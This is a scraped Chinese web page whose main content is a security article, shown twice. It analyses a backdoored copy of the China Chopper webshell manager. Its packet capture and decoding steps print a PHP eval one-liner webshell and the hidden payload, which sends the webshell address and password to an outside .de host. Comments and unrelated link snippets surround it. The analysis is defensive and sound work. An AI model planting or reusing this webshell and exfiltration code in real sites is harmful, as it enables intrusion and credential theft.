来源:蜘蛛抓取(WebSpider)
时间:2015-09-21 04:37
标签:
无后门过狗菜刀
手工检测黑客工具中国菜刀是否包含后门 - 简书
手工检测黑客工具中国菜刀是否包含后门
手工检测黑客工具中国菜刀是否包含后门<by simeon
0×00 前言
我国有一句古话“常在河边走,哪有不湿鞋”,互联网上流传的工具很多是带有后门的,例如SSH Secure Client就曾被曝留有后门(),在工具中留后门,那么就可以源源不断的获取“活的”攻击者、管理员等提交登录的帐号和密码,获取服务器和webshell等权限,那么在著名的webshell管理工具中国菜刀会不会留有后门呢?请看参考本文的分析,亲自操作一把就知道了!0×01 菜刀简介软件名称:中国菜刀(China chopper),中国菜刀,不是原来切菜做饭的道具,而是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。官方网站:,官方于2014年停止对外提供服务,最终版本下载地址为0×02 实验准备环境
(1)在本机安装ComsenzEXP,下载地址:/downloads/install/exp
(2)在ComsenzEXP安装目录的wwwroot下面新建一句话后门php文件。
(3)WSockExpert_Cn程序
(4)encode程序
(5)带有后门的chopper程序一套
0×03 分析并获取后门过程(1)新建一条中国菜刀记录在中国菜刀中新建一条记录,加入一句话后门地址“http://127.0.0.1/1.php”密码为“x”,如图1所示。
图1新建webshell管理记录(2)设置WSockExpert抓包软件打开WSockExpert软件,也可以选择其它抓包软件,选择需要监听的程序(打开文件夹那个图标按钮),在本例中选择“中国菜刀”,如图2所示,设置完成后WSockExpert开始对中国菜刀进行监听并获取其通信过程的包等数据。
图2设置WSockExpert抓包软件(3)使用中国菜刀打开webshell在中国菜刀中打开webshell记录http://127.0.0.1/1.php,如图3所示,可以对webshell所在的计算机上浏览、删除、上传等文件操作。
图3打开webshell(4)获取抓包数据在WSockExpert软件窗口可以看到抓取的数据包记录,在其中选择第二条记录,如图4所示,将数据包的内容复制,其内容如下:x=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVoY0drdVkyOXRMbVJsTDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk%2FJHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7以上代码中包含url编码,无法看出什么。
图4查看数据包(5)对url数据进行解包将上面获取的数据复制到Encode中,如图5所示,选择“URI”类型,单击“Decoder”进行解码;单击“Encoder”按钮对输入框中的内容进行编码。
图5对url数据进行解码解码后的数据变为:x=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVoY0drdVkyOXRMbVJsTDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk/JHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7将解码后的“z0=”后面的数据复制到Encode输入框中,选择base64解码,如图6所示,获取第一次base64解码后的数据,在标红的部分还存在base64加密。@eval(base64_decode('aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL3d3dy5hcGkuY29tLmRlL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicmUGFzcz0nLmtleSgkX1BPU1QpKTt9'));@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-&|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z")as$L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print$R;;echo("|&-");die();
图6第一次base64解码
将上面标红的部分的base64加密代码复制到Encode程序输入框中,选择base64进行Decode,如图7所示,获取其后门地址代码:
if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('.de
/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&
Pass='.key($_POST));},
.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST)
为后门接收地址,在黑客打开webshell时会自动将shell地址和密码发送到网站.de。
图7获取后门地址0×04 后记通过上面的分析,可以了解到中国菜刀被留后门,用户在使用该工具过程中会自动将webshell记录发送到指定网站进行接收。因此在网上下载的工具,一定要留一个心眼,最好将其放在虚拟机中运行,尽量到官方发布的网站进行下载。参考文章:1.2.3.文章涉及工具及录像可下载地址:
专注与网络安全技术研究。> 中国菜刀怎么挂黑页
Recorded Future公司发布的一篇报告称,两名中国安全研究人员开发的一种新型的Webshell管理工
史上最牛逼的中国菜刀即将发布,过市面上所有的 waf,而且把 webshell 玩到让你瞠目结舌的
地址:http:
123 127 198 90 mslife_wx managerLogin jspshell:http:
123 127 198 90 f index jsp密码:023菜刀连
0x1:waf拦截原理;0x2:绕过waf思路;0x3:burp插件代码实现原理;0x4:代码片段
很多朋友在使用Cknife时都误以为她只是菜刀的跨平台升级版,仅仅多了跨平台的功能,其实
澳大利亚与中国达成网络安全协议 网络互不攻击,澳大利亚已与中国达成一项网络安全协
百度站长平台开启原创保护站点内测:采集、伪原创未来堪忧。2017MADCon中国互联网优化大
当植入好莱坞成为一场联合营销,植入《速8》的中国移动和QQ赢了吗?《速度与激情8》再
WiFi万能钥匙CSO龚蔚:安全教父的理想国。1996年是中国网安行业元年,龚蔚与这个领域的开
独占57% 海信激光电视逆势崛起,超大屏幕电视一向是外资品牌在中国市场的战略要塞,而
swustoj旋转方阵(0484):swustoj旋转方阵(0484)题又该怎么解答呢?希望下面的文章对大家有所帮
怎么添加电脑工具栏:1、在任务栏的非按钮区右击。2、在工具栏菜单项下选择要添加的工
手机斗鱼TV怎么录制视频:1)首先,我们打开斗鱼TV软件点击右下角的【+】,接着再点击【
腾讯视频已上传视频怎么删除:点击上面的上传按钮,进入到上传的界面里面的。
Win10插入硬盘自动打开资源管理器怎么禁止:1、点任务栏左下角win标或者按键盘上的win键,
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风
0x00 前言常言道,出来混总是要还的,看了乌云知识库的《网络小黑揭秘系列之黑产江湖黑
Author:360天眼安全实验室0x00 引子人在做,天在看。黑产乃法外之地,被丛林法则所支
传统的ob_start马是这样用:经过本人测试这种方法在PHP5 4 X以上版本可以执行代
我国有一句古话&常在河边走,哪有不湿鞋&,互联网上流传的工具很多是带有后门
中国互联网+指数发布:数字经济已占GDP总量三成:4月20日,在杭州举办的2017中国互联网+数
外国公司被黑客骗走17 5万欧元 中国警方千里助其找回,一外企公司总部中了国际黑客的招
天马第6代 LTPS AMOLED产线中国率先点亮,4月21日消息 昨天,天马第6代LTPS AMOLED产线(G6 LTPS AMOL
苹果支付推进缓慢 拿微信开刀,一个全球的硬件终端霸主,一个中国最大的社交生态软件
"在行 "行家接单剧减,中国首个知识付费产品成为过去式?任何知识和技能的培训有最重
Win7系统透明效果怎么关闭:Win7的透明效果想必很多已经升级到Win7系统的用户都体验到了。
win7网络设置怎么备份:打开网络和共享中心:可以通过控制面板,也可以通过双击右下角
wps怎么编辑工具栏,第一步,打开wps,如图所示。
如何调节桌面图标大小和缩放网页,首先我来介绍一下调节效率不高的一种方法。即,按住
win10优化提速教程,点击“开始”菜单,点击“设置”。
热门文章热门标签
12月23日 |
12月23日 |
12月23日 |
12月24日 |
12月24日 |
12月24日 |
12月24日 |
12月24日 |中国菜刀|LOFTER(乐乎) - 让兴趣,更有趣
LOFTER for ipad —— 让兴趣,更有趣
下载移动端
关注最新消息
  被喜欢
  被喜欢
{list posts as post}
{if post.type==1 || post.type == 5}
{if !!post.title}${post.title|escape}{/if}
{if !!post.digest}${post.digest}{/if}
{if post.type==2}
{if post.type == 3}
{if !!post.image}
{if post.type == 4}
{if !!post.image}
{if !!photo.labels && photo.labels.length>0}
{var wrapwidth = photo.ow < 500?photo.ow:500}
{list photo.labels as labs}
{var lbtxtwidth = Math.floor(wrapwidth*(labs.ort==1?labs.x:(100-labs.x))/100)-62}
{if lbtxtwidth>12}
{if !!labs.icon}
{list photos as photo}
{if photo_index==0}{break}{/if}
品牌${make||'-'}
型号${model||'-'}
焦距${focalLength||'-'}
光圈${apertureValue||'-'}
快门速度${exposureTime||'-'}
ISO${isoSpeedRatings||'-'}
曝光补偿${exposureBiasValue||'-'}
镜头${lens||'-'}
{if data.msgRank == 1}{/if}
{if data.askSetting == 1}{/if}
{if defined('posts')&&posts.length>0}
{list posts as post}
{if post_index < 3}
{if post.type == 1 || post.type == 5}
{if !!post.title}${post.title|escape}{/if}
{if !!post.digest}${post.digest}{/if}
{if post.type == 2}
{if post.type == 3}
{if post.type == 4}
{if post.type == 6}
{if drlist.length>0}
更多相似达人:
{list drlist as dr}{if drlist.length === 3 && dr_index === 0}、{/if}{if drlist.length === 3 && dr_index === 1}、{/if}{if drlist.length === 2 && dr_index === 0}、{/if}{/list}
暂无相似达人,
{if defined('posts')&&posts.length>0}
{list posts as post}
{if post.type == 2}
{if post.type == 3}
{if post.type == 4}
{if post.type == 6}
this.p={ currentPage:1,pageNewMode:true,isgooglead3:false,ishotrecompost:false,visitorId:0, first:'',tag:'中国菜刀',recommType:'new',recommenderRole:0,offset:6,type:0,isUserEditor:0,};技术揭秘:如何分析中国菜刀是否包含后门? -
| 关注黑客与极客
技术揭秘:如何分析中国菜刀是否包含后门?
共705078人围观
,发现 51 个不明物体
原创作者:simeon
0×00 前言
我国有一句古话“常在河边走,哪有不湿鞋”,互联网上流传的工具很多是带有后门的,例如SSH Secure Client就曾被曝留有后门(),在工具中留后门,那么就可以源源不断的获取“活的”攻击者、管理员等提交登录的帐号和密码,获取服务器和webshell等权限,那么在著名的webshell管理工具中国菜刀会不会留有后门呢?请看参考本文的分析,亲自操作一把就知道了!
0×01 菜刀简介
软件名称:中国菜刀(China chopper),中国菜刀,不是原来切菜做饭的道具,而是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。
官方网站:,官方于2014年停止对外提供服务,最终版本下载地址为
0×02 实验准备环境
&&(1)在本机安装ComsenzEXP,下载地址:/downloads/install/exp
&&(2)在ComsenzEXP安装目录的wwwroot下面新建一句话后门php文件。
&&(3)WSockExpert_Cn程序
&&(4)encode程序
&&(5)带有后门的chopper程序一套
0×03 分析并获取后门过程
(1)新建一条中国菜刀记录
在中国菜刀中新建一条记录,加入一句话后门地址“http://127.0.0.1/1.php”密码为“x”,如图1所示。
图1新建webshell管理记录
(2)设置WSockExpert抓包软件
打开WSockExpert软件,也可以选择其它抓包软件,选择需要监听的程序(打开文件夹那个图标按钮),在本例中选择“中国菜刀”,如图2所示,设置完成后WSockExpert开始对中国菜刀进行监听并获取其通信过程的包等数据。
图2设置WSockExpert抓包软件
(3)使用中国菜刀打开webshell
在中国菜刀中打开webshell记录http://127.0.0.1/1.php,如图3所示,可以对webshell所在的计算机上浏览、删除、上传等文件操作。
图3打开webshell
(4)获取抓包数据
在WSockExpert软件窗口可以看到抓取的数据包记录,在其中选择第二条记录,如图4所示,将数据包的内容复制,其内容如下:
x=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVoY0drdVkyOXRMbVJsTDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk%2FJHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7
以上代码中包含url编码,无法看出什么。
图4查看数据包
(5)对url数据进行解包
将上面获取的数据复制到Encode中,如图5所示,选择“URI”类型,单击“Decoder”进行解码;单击“Encoder”按钮对输入框中的内容进行编码。
图5对url数据进行解码
解码后的数据变为:
x=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVoY0drdVkyOXRMbVJsTDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk/JHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7
将解码后的“z0=”后面的数据复制到Encode输入框中,选择base64解码,如图6所示,获取第一次base64解码后的数据,在标红的部分还存在base64加密。
@eval(base64_decode('aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL3d3dy5hcGkuY29tLmRlL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicmUGFzcz0nLmtleSgkX1BPU1QpKTt9'));@ini_set(&display_errors&,&0&);@set_time_limit(0);@set_magic_quotes_runtime(0);echo(&-&|&);;$D=dirname($_SERVER[&SCRIPT_FILENAME&]);if($D==&&)$D=dirname($_SERVER[&PATH_TRANSLATED&]);$R=&{$D}\t&;if(substr($D,0,1)!=&/&){foreach(range(&A&,&Z&)
$L)if(is_dir(&{$L}:&))$R.=&{$L}:&;}$R.=&\t&;$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.=&({$usr})&;print
&$R;;echo(&|&-&);die();
图6第一次base64解码
将上面标红的部分的base64加密代码复制到Encode程序输入框中,选择base64进行Decode,如图7所示,获取其后门地址代码:
if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('.de
/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&
Pass='.key($_POST));},
.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST)
为后门接收地址,在黑客打开webshell时会自动将shell地址和密码发送到网站.de。
图7获取后门地址
0×04 后记
通过上面的分析,可以了解到中国菜刀被留后门,用户在使用该工具过程中会自动将webshell记录发送到指定网站进行接收。因此在网上下载的工具,一定要留一个心眼,最好将其放在虚拟机中运行,尽量到官方发布的网站进行下载。
参考文章:
3.文章涉及工具及录像可下载地址:
*作者:simeon,本文属FreeBuf原创奖励计划文章,未经许可禁止转载
多做少说。
统一回复一下大家:1.写本文的目的是让大家学会分析网上的来的工具可能包含后门.2.本文提及的工具均在虚拟机中运行,不是原创工具,不能保证是否有后门,杀毒软件目前已经将中国菜刀定义为病毒.建议所有测试工具均在虚拟机中运行!!!3.原版的工具已经不提供下载了,所以提供一个山寨版本以及包含后门的中国菜刀进行分析.4.本文的目的是交流,不是掐架,有本事你就多写点技术文章进行分享.5.说实话,国内安全圈真正还在踏踏实实做安全技术研究的很少,请扪心自问,您不是在娱乐,而我仍在在坚持做技术研究.安全技术没有三到五年的沉淀都是操蛋的.在社会上懂1个技术就忽悠说懂10个!6.不好意思说下,我自己硬考高级工程师通过了,本人喜欢学习,喜欢技术.欢迎前来交流.
楼主分析的菜刀MD5为
5F6D8D72B639B
,对应maicaidao.org
上所声称的版本。而实际上正版菜刀无此版本。 有的是以下两个 =& ec152a638eab8a =& 4b4a956b9c7dc734f339fa05e4c2a990
千秋邈矣独留我,百战归来再读书
确定菜刀官方网站是www.maicaidao.org而不是??
楼主简历真吊
宁德筝情伊林古筝艺术
难道官网下载的菜刀也不能用吗????
必须您当前尚未登录。
必须(保密)
多做少说。
关注我们 分享每日精选文章
